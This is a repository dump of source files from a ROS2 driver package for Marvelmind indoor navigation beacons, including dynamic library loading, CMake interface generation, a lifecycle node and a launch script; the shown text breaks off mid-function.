deviceType);\r\nstatic pt_mm_device_is_beacon pmm_device_is_beacon= NULL;\r\nbool mmDeviceIsBeacon(uint8_t deviceType) {\r\n if (pmm_device_is_beacon == NULL)\r\n return false;\r\n\r\n return (*pmm_device_is_beacon)(deviceType);\r\n}\r\n\r\ntypedef bool (*pt_mm_device_is_hedgehog) (uint8_t deviceType);\r\nstatic pt_mm_device_is_hedgehog pmm_device_is_hedgehog= NULL;\r\nbool mmDeviceIsHedgehog(uint8_t deviceType) {\r\n if (pmm_device_is_hedgehog == NULL)\r\n return false;\r\n\r\n return (*pmm_device_is_hedgehog)(deviceType);\r\n}\r\n\r\n//////\r\n\r\nvoid marvelmindAPILoad() {\r\n#ifdef WIN32\r\n mmLibrary= LoadLibrary(\"dashapi.dll\");\r\n\r\n pmm_api_version= (pt_mm_api_version ) GetProcAddress(mmLibrary, \"mm_api_version\");\r\n\r\n pmm_open_port= (pt_mm_open_port ) GetProcAddress(mmLibrary, \"mm_open_port\");\r\n pmm_open_port_by_name= (pt_mm_open_port_by_name ) GetProcAddress(mmLibrary, \"mm_open_port_by_name\");\r\n pmm_close_port= (pt_mm_close_port ) GetProcAddress(mmLibrary, \"mm_close_port\");\r\n\r\n pmm_get_version_and_id= (pt_mm_get_version_and_id ) GetProcAddress(mmLibrary, \"mm_get_device_version_and_id\");\r\n pmm_get_devices_list= (pt_mm_get_devices_list ) GetProcAddress(mmLibrary, \"mm_get_devices_list\");\r\n\r\n pmm_wake_device= (pt_mm_wake_device ) GetProcAddress(mmLibrary, \"mm_wake_device\");\r\n pmm_sleep_device= (pt_mm_sleep_device ) GetProcAddress(mmLibrary, \"mm_send_to_sleep_device\");\r\n\r\n pmm_get_beacon_tele= (pt_mm_get_beacon_tele ) GetProcAddress(mmLibrary, \"mm_get_beacon_telemetry\");\r\n\r\n pmm_get_last_locations= (pt_mm_get_last_locations ) GetProcAddress(mmLibrary, \"mm_get_last_locations\");\r\n pmm_get_last_locations2= (pt_mm_get_last_locations2 ) GetProcAddress(mmLibrary, \"mm_get_last_locations2\");\r\n\r\n pmm_get_last_distances= (pt_mm_get_last_distances ) GetProcAddress(mmLibrary, \"mm_get_last_distances\");\r\n\r\n pmm_get_update_rate_setting= (pt_mm_get_update_rate_setting ) GetProcAddress(mmLibrary, \"mm_get_update_rate_setting\");\r\n pmm_set_update_rate_setting= (pt_mm_set_update_rate_setting ) GetProcAddress(mmLibrary, \"mm_set_update_rate_setting\");\r\n\r\n pmm_add_submap= (pt_mm_add_submap ) GetProcAddress(mmLibrary, \"mm_add_submap\");\r\n pmm_delete_submap= (pt_mm_delete_submap ) GetProcAddress(mmLibrary, \"mm_delete_submap\");\r\n\r\n pmm_freeze_submap= (pt_mm_freeze_submap ) GetProcAddress(mmLibrary, \"mm_freeze_submap\");\r\n pmm_unfreeze_submap= (pt_mm_unfreeze_submap ) GetProcAddress(mmLibrary, \"mm_unfreeze_submap\");\r\n\r\n pmm_get_submap_settings= (pt_mm_get_submap_settings ) GetProcAddress(mmLibrary, \"mm_get_submap_settings\");\r\n pmm_set_submap_settings= (pt_mm_set_submap_settings ) GetProcAddress(mmLibrary, \"mm_set_submap_settings\");\r\n\r\n pmm_get_ultrasound_settings= (pt_mm_get_ultrasound_settings ) GetProcAddress(mmLibrary, \"mm_get_ultrasound_settings\");\r\n pmm_set_ultrasound_settings= (pt_mm_set_ultrasound_settings ) GetProcAddress(mmLibrary, \"mm_set_ultrasound_settings\");\r\n\r\n pmm_erase_map= (pt_mm_erase_map ) GetProcAddress(mmLibrary, \"mm_erase_map\");\r\n pmm_set_default_settings= (pt_mm_set_default_settings ) GetProcAddress(mmLibrary, \"mm_set_default_settings\");\r\n\r\n pmm_beacons_to_axes= (pt_mm_beacons_to_axes ) GetProcAddress(mmLibrary, \"mm_beacons_to_axes\");\r\n\r\n pmm_read_flash_dump= (pt_read_flash_dump ) GetProcAddress(mmLibrary, \"mm_read_flash_dump\");\r\n pmm_write_flash_dump= (pt_write_flash_dump ) GetProcAddress(mmLibrary, \"mm_write_flash_dump\");\r\n\r\n pmm_reset_device= (pt_mm_reset_device ) GetProcAddress(mmLibrary, \"mm_reset_device\");\r\n\r\n pmm_get_air_temperature= (pt_mm_get_air_temperature ) GetProcAddress(mmLibrary, \"mm_get_air_temperature\");\r\n pmm_set_air_temperature= (pt_mm_set_air_temperature ) GetProcAddress(mmLibrary, \"mm_set_air_temperature\");\r\n\r\n pmm_set_beacon_location= (pt_mm_set_beacon_location ) GetProcAddress(mmLibrary, \"mm_set_beacon_location\");\r\n\r\n pmm_device_is_modem= (pt_mm_device_is_modem ) GetProcAddress(mmLibrary, \"mm_device_is_modem\");\r\n pmm_device_is_beacon= (pt_mm_device_is_beacon ) GetProcAddress(mmLibrary, \"mm_device_is_beacon\");\r\n pmm_device_is_hedgehog= (pt_mm_device_is_hedgehog ) GetProcAddress(mmLibrary, \"mm_device_is_hedgehog\");\r\n#else\r\n// not WIN32\r\n mmLibrary = dlopen(\"libdashapi.so\", RTLD_LAZY);\r\n\r\n pmm_api_version= dlsym(mmLibrary, \"mm_api_version\");\r\n\r\n pmm_open_port= dlsym(mmLibrary, \"mm_open_port\");\r\n pmm_close_port= dlsym(mmLibrary, \"mm_close_port\");\r\n\r\n pmm_get_version_and_id= dlsym(mmLibrary, \"mm_get_device_version_and_id\");\r\n pmm_get_devices_list= dlsym(mmLibrary, \"mm_get_devices_list\");\r\n\r\n pmm_wake_device= dlsym(mmLibrary, \"mm_wake_device\");\r\n pmm_sleep_device= dlsym(mmLibrary, \"mm_send_to_sleep_device\");\r\n\r\n pmm_get_beacon_tele= dlsym(mmLibrary, \"mm_get_beacon_telemetry\");\r\n\r\n pmm_get_last_locations= dlsym(mmLibrary, \"mm_get_last_locations\");\r\n pmm_get_last_locations2= dlsym(mmLibrary, \"mm_get_last_locations2\");\r\n\r\n pmm_get_last_distances= dlsym(mmLibrary, \"mm_get_last_distances\");\r\n\r\n pmm_get_update_rate_setting= dlsym(mmLibrary, \"mm_get_update_rate_setting\");\r\n pmm_set_update_rate_setting= dlsym(mmLibrary, \"mm_set_update_rate_setting\");\r\n\r\n pmm_add_submap= dlsym(mmLibrary, \"mm_add_submap\");\r\n pmm_delete_submap= dlsym(mmLibrary, \"mm_delete_submap\");\r\n\r\n pmm_freeze_submap= dlsym(mmLibrary, \"mm_freeze_submap\");\r\n pmm_unfreeze_submap= dlsym(mmLibrary, \"mm_unfreeze_submap\");\r\n\r\n pmm_get_submap_settings= dlsym(mmLibrary, \"mm_get_submap_settings\");\r\n pmm_set_submap_settings= dlsym(mmLibrary, \"mm_set_submap_settings\");\r\n\r\n pmm_get_ultrasound_settings= dlsym(mmLibrary, \"mm_get_ultrasound_settings\");\r\n pmm_set_ultrasound_settings= dlsym(mmLibrary, \"mm_set_ultrasound_settings\");\r\n\r\n pmm_erase_map= dlsym(mmLibrary, \"mm_erase_map\");\r\n pmm_set_default_settings= dlsym(mmLibrary, \"mm_set_default_settings\");\r\n\r\n pmm_beacons_to_axes= dlsym(mmLibrary, \"mm_beacons_to_axes\");\r\n\r\n pmm_read_flash_dump= dlsym(mmLibrary, \"mm_read_flash_dump\");\r\n pmm_write_flash_dump= dlsym(mmLibrary, \"mm_write_flash_dump\");\r\n\r\n pmm_reset_device= dlsym(mmLibrary, \"mm_reset_device\");\r\n\r\n pmm_get_air_temperature= dlsym(mmLibrary, \"mm_get_air_temperature\");\r\n pmm_set_air_temperature= dlsym(mmLibrary, \"mm_set_air_temperature\");\r\n\r\n pmm_set_beacon_location= dlsym(mmLibrary, \"mm_set_beacon_location\");\r\n\r\n pmm_device_is_modem= dlsym(mmLibrary, \"mm_device_is_modem\");\r\n pmm_device_is_beacon= dlsym(mmLibrary, \"mm_device_is_beacon\");\r\n pmm_device_is_hedgehog= dlsym(mmLibrary, \"mm_device_is_hedgehog\");\r\n#endif\r\n}\r\n\r\nvoid marvelmindAPIFree() {\r\n#ifdef WIN32\r\n FreeLibrary(mmLibrary);\r\n#else\r\n dlclose(mmLibrary);\r\n#endif\r\n}\r\n"
},
{
"alpha_fraction": 0.74490886926651,
"alphanum_fraction": 0.7556270360946655,
"avg_line_length": 22.923076629638672,
"blob_id": "a6458ffb85f6e1026764c066937d06b381b0de64",
"content_id": "0bf6408ac9c4e980a95fe9ceb37e64bd805690ae",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 933,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 39,
"path": "/marvelmind_interfaces/CMakeLists.txt",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 3.5)\nproject(marvelmind_interfaces)\n\n## Default to C99\n#if(NOT CMAKE_C_STANDARD)\n# set(CMAKE_C_STANDARD 99)\n#endif()\n\n## Default to C++14\n#if(NOT CMAKE_CXX_STANDARD)\n# set(CMAKE_CXX_STANDARD 14)\n#endif()\n\n#if(CMAKE_COMPILER_IS_GNUCXX OR CMAKE_CXX_COMPILER_ID MATCHES \"Clang\")\n# add_compile_options(-Wall -Wextra -Wpedantic)\n#endif()\n\n# find dependencies\nfind_package(ament_cmake REQUIRED)\nfind_package(rosidl_default_generators REQUIRED)\nfind_package(builtin_interfaces REQUIRED)\n\n# Custom interfaces\nrosidl_generate_interfaces(${PROJECT_NAME}\n \"msg/BeaconDistance.msg\"\n \"msg/BeaconPosA.msg\"\n \"msg/HedgeImuFusion.msg\"\n \"msg/HedgeImuRaw.msg\"\n \"msg/HedgePos.msg\"\n \"msg/HedgePosA.msg\"\n \"msg/HedgePosAng.msg\"\n \"msg/HedgeQuality.msg\"\n \"msg/HedgeTelemetry.msg\"\n \"msg/MarvelmindWaypoint.msg\"\n DEPENDENCIES builtin_interfaces\n )\n\nament_export_dependencies(rosidl_default_runtime)\nament_package()\n"
},
{
"alpha_fraction": 0.7900750637054443,
"alphanum_fraction": 0.7907280325889587,
"avg_line_length": 45.40909194946289,
"blob_id": "5d5ea7a632c91f21b619c2d5094c4cc60839a328",
"content_id": "6083e3246eefe7a260b8c4c9f604c2ff8e4b090f",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 6126,
"license_type": "permissive",
"max_line_length": 149,
"num_lines": 132,
"path": "/marvelmind_nav/include/marvelmind_nav/marvelmind_navigation.hpp",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "#ifndef MARVELMIND_NAVIGATION_H\n#define MARVELMIND_NAVIGATION_H\n\n#include <fcntl.h>\n#include <iostream>\n#include <semaphore.h>\n#include <sstream>\n#include <stdbool.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <chrono>\n\n#include \"rclcpp/rclcpp.hpp\"\n#include \"rclcpp_lifecycle/lifecycle_node.hpp\"\n#include \"rclcpp_lifecycle/lifecycle_publisher.hpp\"\n\n#include \"marvelmind_interfaces/msg/hedge_pos.hpp\"\n#include \"marvelmind_interfaces/msg/hedge_pos_a.hpp\"\n#include \"marvelmind_interfaces/msg/hedge_pos_ang.hpp\"\n#include \"marvelmind_interfaces/msg/beacon_pos_a.hpp\"\n#include \"marvelmind_interfaces/msg/hedge_imu_raw.hpp\"\n#include \"marvelmind_interfaces/msg/hedge_imu_fusion.hpp\"\n#include \"marvelmind_interfaces/msg/beacon_distance.hpp\"\n#include \"marvelmind_interfaces/msg/hedge_telemetry.hpp\"\n#include \"marvelmind_interfaces/msg/hedge_quality.hpp\"\n#include \"marvelmind_interfaces/msg/marvelmind_waypoint.hpp\"\n#include \"std_msgs/msg/string.hpp\"\nextern \"C\"\n{\n#include \"marvelmind_nav/marvelmind_hedge.h\"\n#include \"marvelmind_nav/marvelmind_api.h\"\n}\n\n\n#define ROS_NODE_NAME \"hedge_rcv_bin\"\n#define HEDGE_POSITION_TOPIC_NAME \"hedge_pos\"\n#define HEDGE_POSITION_ADDRESSED_TOPIC_NAME \"hedge_pos_a\"\n#define HEDGE_POSITION_WITH_ANGLE_TOPIC_NAME \"hedge_pos_ang\"\n#define BEACONS_POSITION_ADDRESSED_TOPIC_NAME \"beacons_pos_a\"\n#define HEDGE_IMU_RAW_TOPIC_NAME \"hedge_imu_raw\"\n#define HEDGE_IMU_FUSION_TOPIC_NAME \"hedge_imu_fusion\"\n#define BEACON_RAW_DISTANCE_TOPIC_NAME \"beacon_raw_distance\"\n#define HEDGE_TELEMETRY_TOPIC_NAME \"hedge_telemetry\"\n#define HEDGE_QUALITY_TOPIC_NAME \"hedge_quality\"\n#define MARVELMIND_WAYPOINT_TOPIC_NAME \"marvelmind_waypoint\"\n\n\n\nclass MarvelmindNavigation : public rclcpp_lifecycle::LifecycleNode\n{\npublic:\n explicit MarvelmindNavigation(const std::string & node_name,int argc, char **argv, bool intra_process_comms=false)\n : rclcpp_lifecycle::LifecycleNode(node_name, rclcpp::NodeOptions().use_intra_process_comms(intra_process_comms)),\n argc_(argc),argv_(argv)\n{}\n rclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn on_activate(const rclcpp_lifecycle::State &);\n rclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn on_deactivate(const rclcpp_lifecycle::State &);\n rclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn on_error(const rclcpp_lifecycle::State &);\n rclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn on_cleanup(const rclcpp_lifecycle::State &);\n rclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn on_configure(const rclcpp_lifecycle::State &);\n rclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn on_shutdown(const rclcpp_lifecycle::State &);\n~MarvelmindNavigation() {}\n\nprivate:\n int argc_;\n char **argv_;\n std::shared_ptr<rclcpp::TimerBase> timer_;\n bool are_publishers_active_;\n uint8_t beaconReadIterations;\n\n struct MarvelmindHedge * hedge= NULL;\n struct timespec ts;\n\n static uint32_t hedge_timestamp_prev;\n// static sem_t *sem;\n\n marvelmind_interfaces::msg::HedgePos hedge_pos_noaddress_msg;// hedge coordinates message (old version without address) for publishing to ROS topic\n marvelmind_interfaces::msg::HedgePosA hedge_pos_msg;// hedge coordinates message for publishing to ROS topic\n marvelmind_interfaces::msg::HedgePosAng hedge_pos_ang_msg;// hedge coordinates and angle message for publishing to ROS topic\n marvelmind_interfaces::msg::BeaconPosA beacon_pos_msg;// stationary beacon coordinates message for publishing to ROS topic\n marvelmind_interfaces::msg::HedgeImuRaw hedge_imu_raw_msg;// raw IMU data message for publishing to ROS topic\n marvelmind_interfaces::msg::HedgeImuFusion hedge_imu_fusion_msg;// IMU fusion data message for publishing to ROS topic\n marvelmind_interfaces::msg::BeaconDistance beacon_raw_distance_msg;// Raw distance message for publishing to ROS topic\n marvelmind_interfaces::msg::HedgeTelemetry hedge_telemetry_msg;// Telemetry message for publishing to ROS topic\n marvelmind_interfaces::msg::HedgeQuality hedge_quality_msg;// Quality message for publishing to ROS topic\n marvelmind_interfaces::msg::MarvelmindWaypoint marvelmind_waypoint_msg;// Waypoint message for publishing to ROS topic\n\n std::shared_ptr<rclcpp_lifecycle::LifecyclePublisher<marvelmind_interfaces::msg::HedgePosAng>> hedge_pos_ang_publisher_;\n std::shared_ptr<rclcpp_lifecycle::LifecyclePublisher<marvelmind_interfaces::msg::HedgePosA>> hedge_pos_publisher_;\n std::shared_ptr<rclcpp_lifecycle::LifecyclePublisher<marvelmind_interfaces::msg::HedgePos>> hedge_pos_noaddress_publisher_;\n\n std::shared_ptr<rclcpp_lifecycle::LifecyclePublisher<marvelmind_interfaces::msg::BeaconPosA>> beacons_pos_publisher_;\n\n std::shared_ptr<rclcpp_lifecycle::LifecyclePublisher<marvelmind_interfaces::msg::HedgeImuRaw>> hedge_imu_raw_publisher_;\n std::shared_ptr<rclcpp_lifecycle::LifecyclePublisher<marvelmind_interfaces::msg::HedgeImuFusion>> hedge_imu_fusion_publisher_;\n\n std::shared_ptr<rclcpp_lifecycle::LifecyclePublisher<marvelmind_interfaces::msg::BeaconDistance>> beacon_distance_publisher_;\n\n std::shared_ptr<rclcpp_lifecycle::LifecyclePublisher<marvelmind_interfaces::msg::HedgeTelemetry>> hedge_telemetry_publisher_;\n std::shared_ptr<rclcpp_lifecycle::LifecyclePublisher<marvelmind_interfaces::msg::HedgeQuality>> hedge_quality_publisher_;\n\n std::shared_ptr<rclcpp_lifecycle::LifecyclePublisher<marvelmind_interfaces::msg::MarvelmindWaypoint>> marvelmind_waypoint_publisher_;\n\n\n\n// Marvelmind internal functions\n int hedgeReceivePrepare();\n bool hedgeReceiveCheck();\n bool beaconReceiveCheck();\n bool hedgeIMURawReceiveCheck();\n bool hedgeIMUFusionReceiveCheck();\n void getRawDistance(uint8_t index);\n bool hedgeTelemetryUpdateCheck();\n bool hedgeQualityUpdateCheck();\n bool marvelmindWaypointUpdateCheck();\n\n// LC node functions\n void activateAllPublishers();\n void createPublishers();\n void deactivateAllPublishers();\n void resetAllPublishers();\n void setMessageDefaults();\n\n void main_loop();\n void marvelmindAPILoad();\n void marvelmindAPIFree();\n\n};\n\n\n\n#endif // MARVELMIND_NAVIGATION_H\n"
},
{
"alpha_fraction": 0.6450742483139038,
"alphanum_fraction": 0.662618100643158,
"avg_line_length": 20.823530197143555,
"blob_id": "f73216330d1b263a7080fc6b8a80fbea3a2fa777",
"content_id": "e8e91148e889afae89ebc7ecceca58d70345c030",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 741,
"license_type": "permissive",
"max_line_length": 55,
"num_lines": 34,
"path": "/marvelmind_nav/src/sleep_beacon_node.cpp",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "#include <chrono>\n#include <string>\n#include <iostream> \n#include \"rclcpp/rclcpp.hpp\"\n#include \"std_msgs/msg/string.hpp\"\nextern \"C\"\n{\n#include \"marvelmind_nav/marvelmind_example.h\"\n#include \"marvelmind_nav/marvelmind_devices.h\"\n#include \"marvelmind_nav/marvelmind_utils.h\"\n#include \"marvelmind_nav/marvelmind_pos.h\"\n#include \"marvelmind_nav/marvelmind_api.h\"\n}\n\nusing namespace std::chrono_literals;\n\n\nint main()\n{\n marvelmindStart();\n char str[7] = {'s', 'l', 'e', 'e', 'p', ' ', '0'};\n char *token1 = strtok(str, \" \");\n trim(token1);\n char *token2 = strtok(NULL, \" \");\n while(!marvelmindCycle());\n while(marvelmindCheckSleepCommand(token1, token2));\n sleep_ms(10000);\n \n\n\n marvelmindFinish();\n\n return 0;\n}"
},
{
"alpha_fraction": 0.6800100207328796,
"alphanum_fraction": 0.6825118660926819,
"avg_line_length": 38.186275482177734,
"blob_id": "0e1af853721cb4c5d9dabcd8078b97b443c60e61",
"content_id": "dc57e369aeabe76635eaaaeb1e87cdd6c1eb9072",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3997,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 102,
"path": "/marvelmind_nav/launch/marvel_driver_launch.py",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "# Based on https://github.com/ros2/launch_ros/blob/master/launch_ros/examples/lifecycle_pub_sub_launch.py \n\n\"\"\"Launch a lifecycle marvel_node.\"\"\"\n\nimport os\nimport sys\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), '..')) # noqa\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..', 'launch')) # noqa\n\nimport launch\nimport launch.actions\nimport launch.events\n\nfrom launch.actions import DeclareLaunchArgument, IncludeLaunchDescription\nfrom launch.launch_description_sources import PythonLaunchDescriptionSource\nfrom launch.substitutions import LaunchConfiguration, ThisLaunchFileDir\n# from launch import LaunchDescription\n# from launch_ros import get_default_launch_description\n\nfrom launch.launch_context import LaunchContext\n\nimport launch_ros.actions\nimport launch_ros.events\nimport launch_ros.events.lifecycle\n\nimport lifecycle_msgs.msg\n\ndef generate_launch_description(argv=sys.argv[1:]):\n \"\"\"Run lifecycle nodes via launch.\"\"\"\n ld = launch.LaunchDescription()\n\n port = LaunchConfiguration('port')\n declare_port_cmd = DeclareLaunchArgument(\n 'port',\n default_value='/dev/ttyACM0',\n description='Port for serial comm')\n ld.add_action(declare_port_cmd)\n\n context = LaunchContext()\n # print(\"Port is: {}\".format(port.perform(context)))\n # Prepare the marvel node.\n marvel_node = launch_ros.actions.LifecycleNode(\n node_name='marvelmind_nav', \n package='marvelmind_nav', \n node_executable='marvelmind_nav', \n output='screen',\n arguments=['/dev/ttyACM0','9600'])\n\n # When the marvel reaches the 'inactive' state, make it take the 'activate' transition.\n register_event_handler_for_marvel_reaches_inactive_state = launch.actions.RegisterEventHandler(\n launch_ros.event_handlers.OnStateTransition(\n target_lifecycle_node=marvel_node, goal_state='inactive',\n entities=[\n launch.actions.LogInfo(\n msg=\"node 'marvelmind_nav' reached the 'inactive' state, 'activating'.\"),\n launch.actions.EmitEvent(\n event=launch_ros.events.lifecycle.ChangeState(\n lifecycle_node_matcher=launch.events.matches_action(marvel_node),\n transition_id=lifecycle_msgs.msg.Transition.TRANSITION_ACTIVATE,\n )),\n ],\n )\n )\n\n # When the marvel node reaches the 'active' state, log a message \n register_event_handler_for_marvel_reaches_active_state = launch.actions.RegisterEventHandler(\n launch_ros.event_handlers.OnStateTransition(\n target_lifecycle_node=marvel_node, goal_state='active',\n entities=[\n launch.actions.LogInfo(\n msg=\"node 'marvelmind_nav' reached the 'active' state.\")\n ],\n )\n )\n\n # Make the marvel node take the 'configure' transition.\n emit_event_to_request_that_marvel_does_configure_transition = launch.actions.EmitEvent(\n event=launch_ros.events.lifecycle.ChangeState(\n lifecycle_node_matcher=launch.events.matches_action(marvel_node),\n transition_id=lifecycle_msgs.msg.Transition.TRANSITION_CONFIGURE,\n )\n )# Add the actions to the launch description.\n # The order they are added reflects the order in which they will be executed.\n ld.add_action(register_event_handler_for_marvel_reaches_inactive_state)\n ld.add_action(register_event_handler_for_marvel_reaches_active_state)\n ld.add_action(marvel_node)\n ld.add_action(emit_event_to_request_that_marvel_does_configure_transition)\n \n\n # print('Starting introspection of launch description...')\n # print('')\n\n # print(launch.LaunchIntrospector().format_launch_description(ld))\n\n print('')\n print('Starting launch of launch description...')\n print('')\n\n # ls = launch.LaunchService(argv=argv, debug=True)\n ls = launch.LaunchService(argv=argv)\n ls.include_launch_description(ld)\n return ld\n"
},
{
"alpha_fraction": 0.6294928193092346,
"alphanum_fraction": 0.6449680328369141,
"avg_line_length": 34.8336296081543,
"blob_id": "a3667648978b4f1c51c517302989e88c03e87d49",
"content_id": "260a8dbafec20ba5a1a1c882a7222a9ffe110517",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 20032,
"license_type": "permissive",
"max_line_length": 151,
"num_lines": 559,
"path": "/marvelmind_nav/src/marvelmind_navigation.cpp",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "#include \"marvelmind_nav/marvelmind_navigation.hpp\"\n\nuint32_t MarvelmindNavigation::hedge_timestamp_prev = 0;\nstatic sem_t *sem;\nvoid semCallback()\n{\n sem_post(sem);\n}\n\nrclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn MarvelmindNavigation::on_activate(const rclcpp_lifecycle::State &)\n{\n RCLCPP_INFO_STREAM(get_logger(),std::fixed << \"On activate at \" << this->now().seconds());\n activateAllPublishers();\n return rclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn::SUCCESS;\n}\n\nrclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn MarvelmindNavigation::on_deactivate(const rclcpp_lifecycle::State &)\n{\n RCLCPP_INFO_STREAM(get_logger(),std::fixed << \"On deactivate at \" << this->now().seconds());\n deactivateAllPublishers();\n return rclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn::SUCCESS;\n}\n\nrclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn MarvelmindNavigation::on_error(const rclcpp_lifecycle::State &)\n{\n RCLCPP_INFO_STREAM(get_logger(),std::fixed << \"On error at \" << this->now().seconds());\n return rclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn::SUCCESS;\n}\n\nrclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn MarvelmindNavigation::on_cleanup(const rclcpp_lifecycle::State &)\n{\n RCLCPP_INFO_STREAM(get_logger(),std::fixed << \"On cleanup at \" << this->now().seconds());\n resetAllPublishers();\n timer_.reset();\n if (hedge != NULL)\n {\n stopMarvelmindHedge (hedge);\n destroyMarvelmindHedge (hedge);\n }\n sem_close(sem);\n return rclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn::SUCCESS;\n}\n\n\nrclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn MarvelmindNavigation::on_configure(const rclcpp_lifecycle::State &)\n{\n RCLCPP_INFO_STREAM(get_logger(),std::fixed << \"On configure at \" << this->now().seconds());\n\n sem = sem_open(DATA_INPUT_SEMAPHORE, O_CREAT, 0777, 0);\n\n hedgeReceivePrepare();\n createPublishers();\n setMessageDefaults();\n\n timer_ = this->create_wall_timer(std::chrono::duration<double>(0.005)\n ,std::bind(&MarvelmindNavigation::main_loop, this));\n\n return rclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn::SUCCESS;\n}\n\nrclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn MarvelmindNavigation::on_shutdown(const rclcpp_lifecycle::State &)\n{\n RCLCPP_INFO_STREAM(get_logger(),std::fixed << \"On shutdown at \" << this->now().seconds());\n deactivateAllPublishers();\n timer_.reset();\n if (hedge != NULL)\n {\n stopMarvelmindHedge (hedge);\n destroyMarvelmindHedge (hedge);\n }\n sem_close(sem);\n return rclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn::SUCCESS;\n}\n\nint MarvelmindNavigation::hedgeReceivePrepare()\n{\n // get port name from command line arguments (if specified)\n const char * ttyFileName;\n uint32_t baudRate;\n if (argc_>=2) ttyFileName=argv_[1];\n else ttyFileName=DEFAULT_TTY_FILENAME;\n if (argc_>=3) baudRate= atoi(argv_[2]);\n else baudRate=DEFAULT_TTY_BAUDRATE;\n\n // Init\n hedge=createMarvelmindHedge ();\n if (hedge==NULL)\n {\n RCLCPP_INFO(get_logger(),\"Error: Unable to create MarvelmindHedge\");\n return -1;\n }\n\n hedge->ttyFileName=ttyFileName;\n hedge->baudRate= baudRate;\n hedge->verbose=true; // show errors and warnings\n hedge->anyInputPacketCallback= semCallback;\n\n RCLCPP_INFO_STREAM(get_logger(),\"Creating a connection at: \" << argv_[1] << \" with baud rate: \" << argv_[2]);\n startMarvelmindHedge(hedge);\n return 1;\n}\n\nbool MarvelmindNavigation::hedgeReceiveCheck()\n{\n if (hedge->haveNewValues_)\n {\n struct PositionValue position;\n getPositionFromMarvelmindHedge (hedge, &position);\n\n hedge_pos_msg.address= position.address;\n hedge_pos_ang_msg.address= position.address;\n\n hedge_pos_msg.flags= position.flags;\n hedge_pos_noaddress_msg.flags= position.flags;\n hedge_pos_ang_msg.flags= position.flags;\n if (hedge_pos_msg.flags&(1<<1))// flag of timestamp format\n {\n hedge_pos_msg.timestamp_ms= position.timestamp;// msec\n hedge_pos_noaddress_msg.timestamp_ms= position.timestamp;\n }\n else\n {\n hedge_pos_msg.timestamp_ms= position.timestamp*15.625;// alpha-cycles ==> msec\n hedge_pos_noaddress_msg.timestamp_ms= position.timestamp*15.625;\n }\n hedge_pos_ang_msg.timestamp_ms= position.timestamp;\n\n hedge_pos_msg.x_m= position.x/1000.0;\n hedge_pos_msg.y_m= position.y/1000.0;\n hedge_pos_msg.z_m= position.z/1000.0;\n\n hedge_pos_noaddress_msg.x_m= position.x/1000.0;\n hedge_pos_noaddress_msg.y_m= position.y/1000.0;\n hedge_pos_noaddress_msg.z_m= position.z/1000.0;\n\n hedge_pos_ang_msg.x_m= position.x/1000.0;\n hedge_pos_ang_msg.y_m= position.y/1000.0;\n hedge_pos_ang_msg.z_m= position.z/1000.0;\n\n hedge_pos_ang_msg.angle= position.angle;\n\n hedge->haveNewValues_=false;\n\n return true;\n }\n return false;\n}\n\nbool MarvelmindNavigation::beaconReceiveCheck()\n{\n uint8_t i;\n struct StationaryBeaconsPositions positions;\n struct StationaryBeaconPosition *bp= NULL;\n bool foundUpd= false;\n uint8_t n;\n\n getStationaryBeaconsPositionsFromMarvelmindHedge (hedge, &positions);\n n= positions.numBeacons;\n if (n == 0)\n return false;\n\n for(i=0;i<n;i++)\n {\n bp= &positions.beacons[i];\n if (bp->updatedForMsg)\n {\n clearStationaryBeaconUpdatedFlag(hedge, bp->address);\n foundUpd= true;\n break;\n }\n }\n if (!foundUpd)\n return false;\n if (bp == NULL)\n return false;\n\n beacon_pos_msg.address= bp->address;\n beacon_pos_msg.x_m= bp->x/1000.0;\n beacon_pos_msg.y_m= bp->y/1000.0;\n beacon_pos_msg.z_m= bp->z/1000.0;\n\n return true;\n}\n\nbool MarvelmindNavigation::hedgeIMURawReceiveCheck()\n{\n if (!hedge->rawIMU.updated)\n return false;\n\n hedge_imu_raw_msg.acc_x= hedge->rawIMU.acc_x;\n hedge_imu_raw_msg.acc_y= hedge->rawIMU.acc_y;\n hedge_imu_raw_msg.acc_z= hedge->rawIMU.acc_z;\n\n hedge_imu_raw_msg.gyro_x= 